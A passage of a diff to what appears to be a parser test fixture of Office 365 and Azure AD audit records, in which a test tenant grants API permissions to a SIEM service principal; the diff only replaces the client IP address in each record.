APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -22995,9 +22995,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -23231,7 +23231,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -23261,9 +23261,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -23497,7 +23497,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 